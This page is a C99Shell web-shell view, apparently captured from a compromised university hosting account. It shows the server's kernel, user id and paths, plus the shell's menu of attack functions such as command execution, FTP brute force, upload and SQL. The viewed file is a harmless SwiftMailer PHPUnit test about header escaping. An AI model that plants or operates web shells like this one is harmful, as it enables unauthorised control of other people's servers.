!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/swiftmailer/swiftmailer/tests/bug/Swift/   drwxr-xr-x
Free 116.64 GB of 200.55 GB (58.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Bug111Test.php (1.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

class Swift_Bug111Test extends \PHPUnit_Framework_TestCase
{
    public function 
testUnstructuredHeaderSlashesShouldNotBeEscaped()
    {
        
$complicated_header = array(
            
'to' => array(
                
'email1@example.com',
                
'email2@example.com',
                
'email3@example.com',
                
'email4@example.com',
                
'email5@example.com',
            ),
            
'sub' => array(
                
'-name-' => array(
                    
'email1',
                    
'"email2"',
                    
'email3\\',
                    
'email4',
                    
'email5',
                ),
                
'-url-' => array(
                    
'http://google.com',
                    
'http://yahoo.com',
                    
'http://hotmail.com',
                    
'http://aol.com',
                    
'http://facebook.com',
                ),
            ),
        );
        
$json json_encode($complicated_header);

        
$message = new Swift_Message();
        
$headers $message->getHeaders();
        
$headers->addTextHeader('X-SMTPAPI'$json);
        
$header $headers->get('X-SMTPAPI');

        
$this->assertEquals('Swift_Mime_Headers_UnstructuredHeader'get_class($header));
        
$this->assertEquals($json$header->getFieldBody());
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0116 ]--